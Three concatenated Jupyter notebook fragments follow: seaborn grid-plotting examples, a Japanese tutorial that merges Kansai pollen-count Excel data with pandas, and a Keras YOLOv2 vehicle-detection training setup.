g.map(sns.distplot, "total_bill", hist=False, rug=True);
```
```
pal = dict(Lunch="seagreen", Dinner="gray")
g = sns.FacetGrid(tips, hue="time", palette=pal, height=5)
g.map(plt.scatter, "total_bill", "tip", s=50, alpha=.7, linewidth=.5, edgecolor="white")
g.add_legend();
```
```
g = sns.FacetGrid(tips, hue="sex", palette="Set1", height=5, hue_kws={"marker": ["^", "v"]})
g.map(plt.scatter, "total_bill", "tip", s=100, linewidth=.5, edgecolor="white")
g.add_legend();
```
```
attend = sns.load_dataset("attention").query("subject <= 12")
g = sns.FacetGrid(attend, col="subject", col_wrap=4, height=2, ylim=(0, 10))
g.map(sns.pointplot, "solutions", "score", color=".3", ci=None);
```
```
with sns.axes_style("white"):
g = sns.FacetGrid(tips, row="sex", col="smoker", margin_titles=True, height=2.5)
g.map(plt.scatter, "total_bill", "tip", color="#334488", edgecolor="white", lw=.5);
g.set_axis_labels("Total bill (US Dollars)", "Tip");
g.set(xticks=[10, 30, 50], yticks=[2, 6, 10]);
g.fig.subplots_adjust(wspace=.02, hspace=.02);
```
```
g = sns.FacetGrid(tips, col="smoker", margin_titles=True, height=4)
g.map(plt.scatter, "total_bill", "tip", color="#338844", edgecolor="white", s=50, lw=1)
for ax in g.axes.flat:
ax.plot((0, 50), (0, .2 * 50), c=".2", ls="--")
g.set(xlim=(0, 60), ylim=(0, 14));
```
```
from scipy import stats
def quantile_plot(x, **kwargs):
qntls, xr = stats.probplot(x, fit=False)
plt.scatter(xr, qntls, **kwargs)
g = sns.FacetGrid(tips, col="sex", height=4)
g.map(quantile_plot, "total_bill");
```
```
def qqplot(x, y, **kwargs):
_, xr = stats.probplot(x, fit=False)
_, yr = stats.probplot(y, fit=False)
plt.scatter(xr, yr, **kwargs)
g = sns.FacetGrid(tips, col="smoker", height=4)
g.map(qqplot, "total_bill", "tip");
```
```
g = sns.FacetGrid(tips, hue="time", col="sex", height=4)
g.map(qqplot, "total_bill", "tip")
g.add_legend();
```
```
g = sns.FacetGrid(tips, hue="time", col="sex", height=4,
hue_kws={"marker": ["s", "D"]})
g.map(qqplot, "total_bill", "tip", s=40, edgecolor="w")
g.add_legend();
```
```
def hexbin(x, y, color, **kwargs):
cmap = sns.light_palette(color, as_cmap=True)
plt.hexbin(x, y, gridsize=15, cmap=cmap, **kwargs)
with sns.axes_style("dark"):
g = sns.FacetGrid(tips, hue="time", col="time", height=4)
g.map(hexbin, "total_bill", "tip", extent=[0, 50, 0, 10]);
```
```
iris = sns.load_dataset("iris")
g = sns.PairGrid(iris)
g.map(plt.scatter);
```
```
g = sns.PairGrid(iris)
g.map_diag(plt.hist)
g.map_offdiag(plt.scatter);
```
```
g = sns.PairGrid(iris, hue="species")
g.map_diag(plt.hist)
g.map_offdiag(plt.scatter)
g.add_legend();
```
```
g = sns.PairGrid(iris, vars=["sepal_length", "sepal_width"], hue="species")
g.map(plt.scatter);
```
```
g = sns.PairGrid(iris)
g.map_upper(plt.scatter)
g.map_lower(sns.kdeplot)
g.map_diag(sns.kdeplot, lw=3, legend=False);
```
```
g = sns.PairGrid(tips, y_vars=["tip"], x_vars=["total_bill", "size"], height=4)
g.map(sns.regplot, color=".3")
g.set(ylim=(-1, 11), yticks=[0, 5, 10]);
```
```
g = sns.PairGrid(tips, hue="size", palette="GnBu_d")
g.map(plt.scatter, s=50, edgecolor="white")
g.add_legend();
```
```
sns.pairplot(iris, hue="species", height=2.5);
```
```
g = sns.pairplot(iris, hue="species", palette="Set2", diag_kind="kde", height=2.5)
```
|
github_jupyter
|
**handson用資料としての注意点**
普通、同じセル上で何度も試行錯誤するので、最終的に上手くいったセルしか残らず、失敗したセルは残りませんし、わざわざ残しません。
今回はhandson用に 試行・思考過程を残したいと思い、エラーやミスが出ても下のセルに進んで処理を実行するようにしています。
notebookのセル単位の実行ができるからこそのやり方かもしれません。良い。
(下のセルから文は常体で書きます。)
kunai (@jdgthjdg)
---
# ここまでの処理を整理して、2008〜2019のデータを繋いでみる
## xls,xlsxファイルを漁る
```
from pathlib import Path
base_dir = Path("../../../data") # 相対パスが違うかも ../ の調整でいけるはず・・・
base_dir.exists()
list(base_dir.glob("*_kansai/*"))
p = list(base_dir.glob("*_kansai/*"))[0]
p.name
kansai_kafun_files = []
for p in base_dir.glob("*_kansai/*"):
# AMeDASだけ弾く
if not p.name.startswith("AMeDAS"):
kansai_kafun_files.append(p)
kansai_kafun_files
```
lock ファイルが混じってしまった。<BR>
AMeDASだけ弾くと .lockファイルも入ってしまう(この時私がこのファイルをエクセル互換ソフトで開いていたため、.lockファイルが生成された)ので、<br>
試しに **読めない文字 ( ë╘ò▓âfü[â )** で引っ掛けてみる
```
kansai_kafun_files = []
for p in base_dir.glob("*_kansai/*"):
# AMeDASだけ弾くと .lockファイルも入ってしまうので、読めない謎の文字で引っ掛けてみる
if p.name.startswith("ë╘ò▓âfü[â"):
kansai_kafun_files.append(p)
kansai_kafun_files
```
いけた(環境によっていけないみたいなので、その時は一つ上の、AMeDASを弾くパターンで)
ソートしてもいいけど、どのみち日付データはとるのでこのまま
---
# 今までの処理を適用していく
```
%matplotlib inline
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
#設定でDataFrameなどが長く表示されないようにします(画面領域の消費を抑えてhandsonをしやすくするため)
# 長い場合の途中の省略表示(...)を出す閾値の設定(折り返しとは無関係)
pd.set_option('max_rows',10)
pd.set_option('max_columns',20) # これを超えたら全部は表示しない。 A B C ... X Y Z のように途中を省く。
p = kansai_kafun_files[-1]
print(p)
df = pd.read_excel(p, skiprows=1).iloc[:,:-2]
df
str_concat_h0_23 = df["年"].astype(str)+"/"+df["月"].astype(str)+"/"+df["日"].astype(str)+"/"+(df["時"]-1).astype(str) # 時から1引いてる
df["date_hour"] = pd.to_datetime(str_concat_h0_23, format="%Y/%m/%d/%H")
df.set_index("date_hour", inplace=True)
df = df.drop(columns=["年","月","日","時",]) # こっちでも全然良い
df
```
# ここまでを関数にする
多くの試行錯誤があったがこれだけのコードに圧縮された・・・
```
def load_kafun_excel(path):
df = pd.read_excel(path, skiprows=1).iloc[:,:-2]
str_concat_h0_23 = df["年"].astype(str)+"/"+df["月"].astype(str)+"/"+df["日"].astype(str)+"/"+(df["時"]-1).astype(str) # 時から1引いてる
df["date_hour"] = pd.to_datetime(str_concat_h0_23, format="%Y/%m/%d/%H")
df.set_index("date_hour", inplace=True)
df = df.drop(columns=["年","月","日","時",]) # こっちでも全然良い
return df
load_kafun_excel(p)
```
## for文で回す
```
kansai_kafun_files
kafun_df_list = []
for p in kansai_kafun_files:
df = load_kafun_excel(p)
kafun_df_list.append(df)
kafun_df_list[0].shape
```
# リスト内のdfを行方向(縦方向, y方向)に連結する
### **[pd.concat](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.concat.html)**
df の連結/結合/マージ
http://pandas.pydata.org/pandas-docs/stable/user_guide/merging.html
```
kafun = pd.concat(kafun_df_list, axis=1)
kafun.shape
kafun.columns
```
<br>
ミスってcolumnsの数が成長した。横方向につながっている
<br>
<br>
```
kafun = pd.concat(kafun_df_list, axis=0) # Warning
```
warning された。 今後ソートしないとのこと
```
kafun = pd.concat(kafun_df_list, axis=0, sort=False)
kafun.shape
```
このaxis方向でも columns が倍くらいに増えている・・・
```
kafun.columns
```
恐らく年が変わった時に列の名前が変わったようだ(多分担当者も)
データのフォーマットが変わると、恐ろしく面倒なことが起きる・・・
```
kafun_df_list[0].columns
kafun_df_list[1].columns
```
# 想像以上に全然違う・・・
ファイル名をみる
```
kansai_kafun_files[0].name
kansai_kafun_files[1].name
```
xlsとxlsxの頃から変わったのかも? とりあえず ロードした時にcolumnsを表示する雑な関数を作って試す
```
def show_columns(path):
df = pd.read_excel(path, skiprows=1).iloc[:,:-2]
return df.columns
for p in kansai_kafun_files:
print(p, show_columns(p))
```
<br>
年が順不同で見にくいので結局ソートしてみる
```
sorted(kansai_kafun_files)
```
---
**もしソートがうまくいかないパスだったら sorted の key=を設定する**
```
p.name[10:14] # ファイル名から年を抜き出すスライスがこれだった
# フォルダ名にかかわらず、ファイル名の 20xx で数値のソートされる
sorted(kansai_kafun_files, key=lambda x:int(x.name[10:14]))
sorted(kansai_kafun_files, key=lambda x: (-1)*int(x.name[10:14])) # マイナスにすれば逆になるのが分かる
```
<br>
ソート後にまた columns を見る
```
for p in sorted(kansai_kafun_files):
print(p, show_columns(p))
```
---
2015年にxlsxに変わった途端に・・・<br>
これでは元データのエクセルか、ウェブページの注釈的なものを探さないと追跡ができない
もういちどエクセルを見てみると、
古いデータには、 "地点" という別のシートがあった!
sheet_nameには文字列以外にもindexが使えるとdocumentに書いてあった。
誰かのブログをコピってるだけだったら気づけなかったかもしれない。(自戒)
```
names = pd.read_excel("../../../data/2008_kansai/ë╘ò▓âfü[â^2008(è╓É╝).xls", sheet_name=1)
names
```
## 列名をrenameするmapperを作る
ここからは適当にメソッドを探して対処していくしかない。。
pandas力が試される・・・
mappingするなら辞書が良いから辞書っぽいのを探す
```
names["地点名"].to_dict()
```
<br>
key:value が index:列の値 となるdictができたので、index を "地点名" 列にして、"施設名" との .to_dictすれば良さそう
```
rename_mapper = names.set_index("地点名")["施設名"].to_dict()
rename_mapper
```
これ。きた。
```
df.rename(columns=rename_mapper).head(1)
# OK
```
関数に埋め込む
```
def load_kafun_excel_renamed_columns(path):
df = pd.read_excel(path, skiprows=1).iloc[:,:-2]
try:
name = pd.read_excel(path, sheet_name=1)
rename_mapper = names.set_index("地点名")["施設名"].to_dict()
df = df.rename(columns=rename_mapper)
except Exception as e:
print(path, e)
str_concat_h0_23 = df["年"].astype(str)+"/"+df["月"].astype(str)+"/"+df["日"].astype(str)+"/"+(df["時"]-1).astype(str) # 時から1引いてる
df["date_hour"] = pd.to_datetime(str_concat_h0_23, format="%Y/%m/%d/%H")
df.set_index("date_hour", inplace=True)
df = df.drop(columns=["年","月","日","時",]) # こっちでも全然良い
return df
kafun_df_list = []
for p in sorted(kansai_kafun_files):
df = load_kafun_excel_renamed_columns(p)
kafun_df_list.append(df)
kafun_renamed = pd.concat(kafun_df_list, axis=0, sort=False)
kafun_renamed.shape
```
xlsxだけエラーになってくれてるのでxlsでは読み込めているようだ
果たして結果は?
```
kafun_renamed.columns
```
---
似た名前を探すためにソートしてみる
```
kafun_renamed.columns.sort_values()
```
---
**'北山緑化植物園','北山緑化植物園(西宮市都市整備公社)'**
**'西播磨', '西播磨県民局西播磨総合庁舎'** とか同一では?
列名のゆらぎが・・・(予想はしていたがこれを全部追うのは大変なので今回はパス!)
ここでHPをもう一度見てみると。
http://kafun.taiki.go.jp/library.html#4
>彦根地方気象台 彦根市城町2丁目5-25 彦根 平成29年度に彦根市役所から移設
>舞鶴市西コミュニティセンター 舞鶴市字南田辺1番地 舞鶴 平成29年度に京都府中丹東保健所より移設
## 追っかけるのも大変、かつ、そこまでを求めていないため、今回は少ないデータも全部残して次へ進む
---
## (今回はしないが)もし少ないものを弾きたいなら
全部の対応を探すのは流石に厳しそうなので、各列での NaNの値を数えてみて、NaNの値が少ないものは2008〜2018まで列名がつながっていると判断する
**count()** がそれに当たる
**sort_values** でソートしている
```
kafun_renamed.count().sort_values(ascending=True).head(10)
kafun_renamed.count().sort_values(ascending=False).head(10) # Falseにしなくても、上のコードをtailにするだけでも良い
```
---
# 一旦ここまでのデータをpickleに保存
ここまでの処理で生成したDataFrameをpickleで保存しておく。
pickle にしておくと読み込みも一瞬。
最初からcsvなどを読んで成形して・・・を行うコードを書かなくても良いので、一時的なセーブデータとしては重宝する!(日付のパースなどの処理をやり直さなくて良いので高速)
```
kafun_renamed
kafun_renamed.to_pickle("kafun03.pkl")
```
# 現状のデータをplotしてみる
```
kafun_renamed.京都府立医科大学.plot()
kafun_renamed.plot(legend=False)
kafun_renamed.tail()
```
|
github_jupyter
|
**Outline of Steps**
+ Initialization
+ Download COCO detection data from http://cocodataset.org/#download
+ http://images.cocodataset.org/zips/train2014.zip <= train images
+ http://images.cocodataset.org/zips/val2014.zip <= validation images
+ http://images.cocodataset.org/annotations/annotations_trainval2014.zip <= train and validation annotations
+ Run this script to convert annotations in COCO format to VOC format
+ https://gist.github.com/chicham/6ed3842d0d2014987186#file-coco2pascal-py
+ Download pre-trained weights from https://pjreddie.com/darknet/yolo/
+ https://pjreddie.com/media/files/yolo.weights
+ Specify the directory of train annotations (train_annot_folder) and train images (train_image_folder)
+ Specify the directory of validation annotations (valid_annot_folder) and validation images (valid_image_folder)
+ Specity the path of pre-trained weights by setting variable *wt_path*
+ Construct equivalent network in Keras
+ Network arch from https://github.com/pjreddie/darknet/blob/master/cfg/yolo-voc.cfg
+ Load the pretrained weights
+ Perform training
+ Perform detection on an image with newly trained weights
+ Perform detection on an video with newly trained weights
# Initialization
```
from keras.models import Sequential, Model
from keras.layers import Reshape, Activation, Conv2D, Input, MaxPooling2D, BatchNormalization, Flatten, Dense, Lambda
from keras.layers.advanced_activations import LeakyReLU
from keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard
from keras.optimizers import SGD, Adam, RMSprop
from keras.layers.merge import concatenate
import matplotlib.pyplot as plt
import keras.backend as K
import tensorflow as tf
import imgaug as ia
from tqdm import tqdm
from imgaug import augmenters as iaa
import numpy as np
import pickle
import os, cv2
from preprocessing import parse_annotation, BatchGenerator
from utils import WeightReader, decode_netout, draw_boxes
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
%matplotlib inline
LABELS = ["car", "truck", "pickup", "tractor", "camping car", "boat","motorcycle", "van", "other", "plane"]
IMAGE_H, IMAGE_W = 416, 416
GRID_H, GRID_W = 13 , 13
BOX = 5
CLASS = len(LABELS)
CLASS_WEIGHTS = np.ones(CLASS, dtype='float32')
OBJ_THRESHOLD = 0.3#0.5
NMS_THRESHOLD = 0.3#0.45
ANCHORS = [0.88,1.69, 1.18,0.7, 1.65,1.77,1.77,0.9, 3.75, 3.57],
NO_OBJECT_SCALE = 1.0
OBJECT_SCALE = 5.0
COORD_SCALE = 1.0
CLASS_SCALE = 1.0
BATCH_SIZE = 16
WARM_UP_BATCHES = 0
TRUE_BOX_BUFFER = 50
wt_path = 'full_yolo_backend.h5'
train_image_folder = 'train_image_folder/'
train_annot_folder = 'train_annot_folder/'
valid_image_folder = 'valid_image_folder/'
valid_annot_folder = 'valid_annot_folder/'
```
# Construct the network
```
# the function to implement the orgnization layer (thanks to github.com/allanzelener/YAD2K)
def space_to_depth_x2(x):
return tf.space_to_depth(x, block_size=2)
input_image = Input(shape=(IMAGE_H, IMAGE_W, 3))
true_boxes = Input(shape=(1, 1, 1, TRUE_BOX_BUFFER , 4))
# Layer 1
x = Conv2D(32, (3,3), strides=(1,1), padding='same', name='conv_1', use_bias=False)(input_image)
x = BatchNormalization(name='norm_1')(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Layer 2
x = Conv2D(64, (3,3), strides=(1,1), padding='same', name='conv_2', use_bias=False)(x)
x = BatchNormalization(name='norm_2')(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Layer 3
x = Conv2D(128, (3,3), strides=(1,1), padding='same', name='conv_3', use_bias=False)(x)
x = BatchNormalization(name='norm_3')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 4
x = Conv2D(64, (1,1), strides=(1,1), padding='same', name='conv_4', use_bias=False)(x)
x = BatchNormalization(name='norm_4')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 5
x = Conv2D(128, (3,3), strides=(1,1), padding='same', name='conv_5', use_bias=False)(x)
x = BatchNormalization(name='norm_5')(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Layer 6
x = Conv2D(256, (3,3), strides=(1,1), padding='same', name='conv_6', use_bias=False)(x)
x = BatchNormalization(name='norm_6')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 7
x = Conv2D(128, (1,1), strides=(1,1), padding='same', name='conv_7', use_bias=False)(x)
x = BatchNormalization(name='norm_7')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 8
x = Conv2D(256, (3,3), strides=(1,1), padding='same', name='conv_8', use_bias=False)(x)
x = BatchNormalization(name='norm_8')(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Layer 9
x = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_9', use_bias=False)(x)
x = BatchNormalization(name='norm_9')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 10
x = Conv2D(256, (1,1), strides=(1,1), padding='same', name='conv_10', use_bias=False)(x)
x = BatchNormalization(name='norm_10')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 11
x = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_11', use_bias=False)(x)
x = BatchNormalization(name='norm_11')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 12
x = Conv2D(256, (1,1), strides=(1,1), padding='same', name='conv_12', use_bias=False)(x)
x = BatchNormalization(name='norm_12')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 13
x = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_13', use_bias=False)(x)
x = BatchNormalization(name='norm_13')(x)
x = LeakyReLU(alpha=0.1)(x)
skip_connection = x
x = MaxPooling2D(pool_size=(2, 2))(x)
# Layer 14
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_14', use_bias=False)(x)
x = BatchNormalization(name='norm_14')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 15
x = Conv2D(512, (1,1), strides=(1,1), padding='same', name='conv_15', use_bias=False)(x)
x = BatchNormalization(name='norm_15')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 16
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_16', use_bias=False)(x)
x = BatchNormalization(name='norm_16')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 17
x = Conv2D(512, (1,1), strides=(1,1), padding='same', name='conv_17', use_bias=False)(x)
x = BatchNormalization(name='norm_17')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 18
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_18', use_bias=False)(x)
x = BatchNormalization(name='norm_18')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 19
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_19', use_bias=False)(x)
x = BatchNormalization(name='norm_19')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 20
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_20', use_bias=False)(x)
x = BatchNormalization(name='norm_20')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 21
skip_connection = Conv2D(64, (1,1), strides=(1,1), padding='same', name='conv_21', use_bias=False)(skip_connection)
skip_connection = BatchNormalization(name='norm_21')(skip_connection)
skip_connection = LeakyReLU(alpha=0.1)(skip_connection)
skip_connection = Lambda(space_to_depth_x2)(skip_connection)
x = concatenate([skip_connection, x])
# Layer 22
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_22', use_bias=False)(x)
x = BatchNormalization(name='norm_22')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 23
x = Conv2D(BOX * (4 + 1 + CLASS), (1,1), strides=(1,1), padding='same', name='conv_23')(x)
output = Reshape((GRID_H, GRID_W, BOX, 4 + 1 + CLASS))(x)
# small hack to allow true_boxes to be registered when Keras build the model
# for more information: https://github.com/fchollet/keras/issues/2790
output = Lambda(lambda args: args[0])([output, true_boxes])
model = Model([input_image, true_boxes], output)
model.summary()
```
# Load pretrained weights
**Load the weights originally provided by YOLO**
```
weight_reader = WeightReader(wt_path)
weight_reader.reset()
nb_conv = 23
for i in range(1, nb_conv+1):
conv_layer = model.get_layer('conv_' + str(i))
if i < nb_conv:
norm_layer = model.get_layer('norm_' + str(i))
size = np.prod(norm_layer.get_weights()[0].shape)
beta = weight_reader.read_bytes(size)
gamma = weight_reader.read_bytes(size)
mean = weight_reader.read_bytes(size)
var = weight_reader.read_bytes(size)
weights = norm_layer.set_weights([gamma, beta, mean, var])
if len(conv_layer.get_weights()) > 1:
bias = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[1].shape))
kernel = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[0].shape))
kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))
kernel = kernel.transpose([2,3,1,0])
conv_layer.set_weights([kernel, bias])
else:
kernel = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[0].shape))
kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))
kernel = kernel.transpose([2,3,1,0])
conv_layer.set_weights([kernel])
```
**Randomize weights of the last layer**
```
layer = model.layers[-4] # the last convolutional layer
weights = layer.get_weights()
new_kernel = np.random.normal(size=weights[0].shape)/(GRID_H*GRID_W)
new_bias = np.random.normal(size=weights[1].shape)/(GRID_H*GRID_W)
layer.set_weights([new_kernel, new_bias])
```
# Perform training
**Loss function**
$$\begin{multline}
\lambda_\textbf{coord}
\sum_{i = 0}^{S^2}
\sum_{j = 0}^{B}
L_{ij}^{\text{obj}}
\left[
\left(
x_i - \hat{x}_i
\right)^2 +
\left(
y_i - \hat{y}_i
\right)^2
\right]
\\
+ \lambda_\textbf{coord}
\sum_{i = 0}^{S^2}
\sum_{j = 0}^{B}
L_{ij}^{\text{obj}}
\left[
\left(
\sqrt{w_i} - \sqrt{\hat{w}_i}
\right)^2 +
\left(
\sqrt{h_i} - \sqrt{\hat{h}_i}
\right)^2
\right]
\\
+ \sum_{i = 0}^{S^2}
\sum_{j = 0}^{B}
L_{ij}^{\text{obj}}
\left(
C_i - \hat{C}_i
\right)^2
\\
+ \lambda_\textrm{noobj}
\sum_{i = 0}^{S^2}
\sum_{j = 0}^{B}
L_{ij}^{\text{noobj}}
\left(
C_i - \hat{C}_i
\right)^2
\\
+ \sum_{i = 0}^{S^2}
L_i^{\text{obj}}
\sum_{c \in \textrm{classes}}
\left(
p_i(c) - \hat{p}_i(c)
\right)^2
\end{multline}$$
```
def custom_loss(y_true, y_pred):
mask_shape = tf.shape(y_true)[:4]
cell_x = tf.to_float(tf.reshape(tf.tile(tf.range(GRID_W), [GRID_H]), (1, GRID_H, GRID_W, 1, 1)))
cell_y = tf.transpose(cell_x, (0,2,1,3,4))
cell_grid = tf.tile(tf.concat([cell_x,cell_y], -1), [BATCH_SIZE, 1, 1, 5, 1])
coord_mask = tf.zeros(mask_shape)
conf_mask = tf.zeros(mask_shape)
class_mask = tf.zeros(mask_shape)
seen = tf.Variable(0.)
total_recall = tf.Variable(0.)
"""
Adjust prediction
"""
### adjust x and y
pred_box_xy = tf.sigmoid(y_pred[..., :2]) + cell_grid
### adjust w and h
pred_box_wh = tf.exp(y_pred[..., 2:4]) * np.reshape(ANCHORS, [1,1,1,BOX,2])
### adjust confidence
pred_box_conf = tf.sigmoid(y_pred[..., 4])
### adjust class probabilities
pred_box_class = y_pred[..., 5:]
"""
Adjust ground truth
"""
### adjust x and y
true_box_xy = y_true[..., 0:2] # relative position to the containing cell
### adjust w and h
true_box_wh = y_true[..., 2:4] # number of cells accross, horizontally and vertically
### adjust confidence
true_wh_half = true_box_wh / 2.
true_mins = true_box_xy - true_wh_half
true_maxes = true_box_xy + true_wh_half
pred_wh_half = pred_box_wh / 2.
pred_mins = pred_box_xy - pred_wh_half
pred_maxes = pred_box_xy + pred_wh_half
intersect_mins = tf.maximum(pred_mins, true_mins)
intersect_maxes = tf.minimum(pred_maxes, true_maxes)
intersect_wh = tf.maximum(intersect_maxes - intersect_mins, 0.)
intersect_areas = intersect_wh[..., 0] * intersect_wh[..., 1]
true_areas = true_box_wh[..., 0] * true_box_wh[..., 1]
pred_areas = pred_box_wh[..., 0] * pred_box_wh[..., 1]
union_areas = pred_areas + true_areas - intersect_areas
iou_scores = tf.truediv(intersect_areas, union_areas)
true_box_conf = iou_scores * y_true[..., 4]
### adjust class probabilities
true_box_class = tf.argmax(y_true[..., 5:], -1)
"""
Determine the masks
"""
### coordinate mask: simply the position of the ground truth boxes (the predictors)
coord_mask = tf.expand_dims(y_true[..., 4], axis=-1) * COORD_SCALE
### confidence mask: penelize predictors + penalize boxes with low IOU
# penalize the confidence of the boxes, which have IOU with some ground truth box < 0.6
true_xy = true_boxes[..., 0:2]
true_wh = true_boxes[..., 2:4]
true_wh_half = true_wh / 2.
true_mins = true_xy - true_wh_half
true_maxes = true_xy + true_wh_half
pred_xy = tf.expand_dims(pred_box_xy, 4)
pred_wh = tf.expand_dims(pred_box_wh, 4)
pred_wh_half = pred_wh / 2.
pred_mins = pred_xy - pred_wh_half
pred_maxes = pred_xy + pred_wh_half
intersect_mins = tf.maximum(pred_mins, true_mins)
intersect_maxes = tf.minimum(pred_maxes, true_maxes)
intersect_wh = tf.maximum(intersect_maxes - intersect_mins, 0.)
intersect_areas = intersect_wh[..., 0] * intersect_wh[..., 1]
true_areas = true_wh[..., 0] * true_wh[..., 1]
pred_areas = pred_wh[..., 0] * pred_wh[..., 1]
union_areas = pred_areas + true_areas - intersect_areas
iou_scores = tf.truediv(intersect_areas, union_areas)
best_ious = tf.reduce_max(iou_scores, axis=4)
conf_mask = conf_mask + tf.to_float(best_ious < 0.6) * (1 - y_true[..., 4]) * NO_OBJECT_SCALE
# penalize the confidence of the boxes, which are reponsible for corresponding ground truth box
conf_mask = conf_mask + y_true[..., 4] * OBJECT_SCALE
### class mask: simply the position of the ground truth boxes (the predictors)
class_mask = y_true[..., 4] * tf.gather(CLASS_WEIGHTS, true_box_class) * CLASS_SCALE
"""
Warm-up training
"""
no_boxes_mask = tf.to_float(coord_mask < COORD_SCALE/2.)
seen = tf.assign_add(seen, 1.)
true_box_xy, true_box_wh, coord_mask = tf.cond(tf.less(seen, WARM_UP_BATCHES),
lambda: [true_box_xy + (0.5 + cell_grid) * no_boxes_mask,
true_box_wh + tf.ones_like(true_box_wh) * np.reshape(ANCHORS, [1,1,1,BOX,2]) * no_boxes_mask,
tf.ones_like(coord_mask)],
lambda: [true_box_xy,
true_box_wh,
coord_mask])
"""
Finalize the loss
"""
nb_coord_box = tf.reduce_sum(tf.to_float(coord_mask > 0.0))
nb_conf_box = tf.reduce_sum(tf.to_float(conf_mask > 0.0))
nb_class_box = tf.reduce_sum(tf.to_float(class_mask > 0.0))
loss_xy = tf.reduce_sum(tf.square(true_box_xy-pred_box_xy) * coord_mask) / (nb_coord_box + 1e-6) / 2.
loss_wh = tf.reduce_sum(tf.square(true_box_wh-pred_box_wh) * coord_mask) / (nb_coord_box + 1e-6) / 2.
loss_conf = tf.reduce_sum(tf.square(true_box_conf-pred_box_conf) * conf_mask) / (nb_conf_box + 1e-6) / 2.
loss_class = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=true_box_class, logits=pred_box_class)
loss_class = tf.reduce_sum(loss_class * class_mask) / (nb_class_box + 1e-6)
loss = loss_xy + loss_wh + loss_conf + loss_class
nb_true_box = tf.reduce_sum(y_true[..., 4])
nb_pred_box = tf.reduce_sum(tf.to_float(true_box_conf > 0.5) * tf.to_float(pred_box_conf > 0.3))
"""
Debugging code
"""
current_recall = nb_pred_box/(nb_true_box + 1e-6)
total_recall = tf.assign_add(total_recall, current_recall)
loss = tf.Print(loss, [tf.zeros((1))], message='Dummy Line \t', summarize=1000)
loss = tf.Print(loss, [loss_xy], message='Loss XY \t', summarize=1000)
loss = tf.Print(loss, [loss_wh], message='Loss WH \t', summarize=1000)
loss = tf.Print(loss, [loss_conf], message='Loss Conf \t', summarize=1000)
loss = tf.Print(loss, [loss_class], message='Loss Class \t', summarize=1000)
loss = tf.Print(loss, [loss], message='Total Loss \t', summarize=1000)
loss = tf.Print(loss, [current_recall], message='Current Recall \t', summarize=1000)
loss = tf.Print(loss, [total_recall/seen], message='Average Recall \t', summarize=1000)
return loss
```
**Parse the annotations to construct train generator and validation generator**
```
generator_config = {
'IMAGE_H' : IMAGE_H,
'IMAGE_W' : IMAGE_W,
'GRID_H' : GRID_H,
'GRID_W' : GRID_W,
'BOX' : BOX,
'LABELS' : LABELS,
'CLASS' : len(LABELS),
'ANCHORS' : ANCHORS,
'BATCH_SIZE' : BATCH_SIZE,
'TRUE_BOX_BUFFER' : 50,
}
def normalize(image):
return image / 255.
train_imgs, seen_train_labels = parse_annotation(train_annot_folder, train_image_folder, labels=LABELS)
### write parsed annotations to pickle for fast retrieval next time
#with open('train_imgs', 'wb') as fp:
# pickle.dump(train_imgs, fp)
### read saved pickle of parsed annotations
#with open ('train_imgs', 'rb') as fp:
# train_imgs = pickle.load(fp)
train_batch = BatchGenerator(train_imgs, generator_config, norm=normalize)
valid_imgs, seen_valid_labels = parse_annotation(valid_annot_folder, valid_image_folder, labels=LABELS)
### write parsed annotations to pickle for fast retrieval next time
#with open('valid_imgs', 'wb') as fp:
# pickle.dump(valid_imgs, fp)
### read saved pickle of parsed annotations
#with open ('valid_imgs', 'rb') as fp:
# valid_imgs = pickle.load(fp)
valid_batch = BatchGenerator(valid_imgs, generator_config, norm=normalize, jitter=False)
```
**Setup a few callbacks and start the training**
```
early_stop = EarlyStopping(monitor='val_loss',
min_delta=0.001,
patience=10,
mode='min',
verbose=1)
checkpoint = ModelCheckpoint('weights_truck2.h5',
monitor='val_loss',
verbose=1,
save_best_only=True,
mode='min',
period=1)
tb_counter = len([log for log in os.listdir(os.path.expanduser('~/logs/')) if 'truck_' in log]) + 1
tensorboard = TensorBoard(log_dir=os.path.expanduser('~/logs/') + 'truck_' + '_' + str(tb_counter),
histogram_freq=0,
write_graph=True,
write_images=False)
